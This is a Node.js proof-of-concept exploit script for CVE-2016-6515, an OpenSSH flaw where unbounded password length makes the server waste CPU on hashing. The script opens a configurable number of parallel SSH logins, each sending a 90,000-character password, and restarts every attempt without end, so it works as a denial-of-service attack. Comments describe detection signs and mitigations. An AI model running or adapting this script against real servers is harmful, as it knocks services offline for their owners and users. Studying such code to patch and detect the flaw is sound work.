POC / exploit.js JS
#!/usr/bin/env node

/*
 * CVE-2016-6515 exploit by opsxcq
 */

var Client = require('ssh2').Client;
var program = require('commander');

/**
 * Print the one-line command synopsis to stdout.
 * Called when any of the required options (host, port, user) is missing.
 */
function usage(){
    var synopsis = "[-] Usage: ./exploit.js -h host -p port -u user";
    console.log(synopsis);
}

// Oversized password string sent on every login attempt: the 9-character
// filler repeated 10000 times (90000 characters in total).
// CVE-2016-6515 concerns sshd accepting password strings without a length
// limit, so the server spends CPU hashing whatever it is handed. A server
// that bounds password length before hashing is not affected by this input.
var pattern = "AAAAAAAAA";
var buffer = pattern.repeat(10000);

/**
 * Start one SSH login attempt against host:port as `user`, using the
 * module-level `buffer` (the oversized string built above) as the password,
 * and start another attempt whenever this one ends, closes or errors.
 *
 * The function never returns a result and has no stop condition: every
 * handler below calls exploit() again with the same arguments.
 *
 * Defender's view: on the server this appears as a sustained stream of
 * password-authentication attempts for a single username from one source,
 * each carrying an unusually large password field. Mitigations are running
 * an sshd build that contains the fix for CVE-2016-6515, turning off
 * password logins (sshd_config `PasswordAuthentication no`) where keys are
 * used, and limiting unauthenticated connections (`MaxStartups`, firewall
 * rate limits).
 *
 * @param {string} host - target host, passed straight to ssh2's connect()
 * @param {number} port - target TCP port
 * @param {string} user - username offered for password authentication
 */
function exploit(host, port, user){
    var conn = new Client();
    // The trailing `//` markers only keep each chained call on its own line.
    conn//
    .on('end', function() {
        // Connection ended: start a fresh attempt.
        exploit(host, port, user); 
    })//
    .on('close', function(err) {
        // Start a fresh attempt unless the close was flagged as an error
        // (presumably because the 'error' handler already restarts in that
        // case - confirm against the ssh2 version in use).
        // NOTE(review): 'end' above restarts unconditionally, so if ssh2
        // emits both 'end' and 'close' for the same connection, one finished
        // attempt is replaced by two and the number of concurrent attempts
        // is not bounded by the --instances option.
        if(!err){
            exploit(host, port, user); 
        }
    })//
    .on('error', function(){
        // Any connection or authentication error also restarts; the error
        // object itself is discarded, so failures are never reported.
        exploit(host, port, user); 
    }) //
    .connect({
        host: host,
        port: port,
        username: user,
        // Same 90000-character string on every attempt.
        password: buffer
    });
}

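// Command-line handling and start-up for the CVE-2016-6515 test client.

/**
 * Base-10 integer coercion for numeric options.
 * commander calls the coercion callback as (value, previousValue); passing
 * bare `parseInt` would therefore use the previous value as the radix when
 * an option is given more than once.
 */
function parseDecimal(value){
    return parseInt(value, 10);
}

program.version('1.0.0')
.option('-p, --port <n>', 'OpenSSH Port', parseDecimal)
.option('-u, --user <n>', 'Remote username to try to login')
.option('-h, --host <n>', 'OpenSSH Host')
.option('-i, --instances <n>', 'How many paralel instances', parseDecimal)
.parse(process.argv);

// Port, user and host are all mandatory. A non-numeric port parses to NaN,
// which is falsy and is treated the same as a missing port.
if (!program.port || !program.user || !program.host){
    usage();
    // The value of a top-level `return` is discarded by Node, so the original
    // `return -1` still exited with status 0. Report the failure through the
    // process exit status instead.
    process.exitCode = 1;
    return;
}

// Number of initial login attempts started below; defaults to 20 when the
// option is absent, zero or not a number.
var instances = program.instances || 20;

try{
    console.log("[+] Exploiting "+program.host+":"+program.port+" with user "+program.user);
    for(var i=0; i < instances; i++){
        exploit(program.host, program.port, program.user);
    }
}catch(e){
    // Only synchronous failures while setting up the clients land here;
    // connection-level errors are delivered to the 'error' handler inside
    // exploit() and are not logged.
    console.log("[-] Exception: "+e);
}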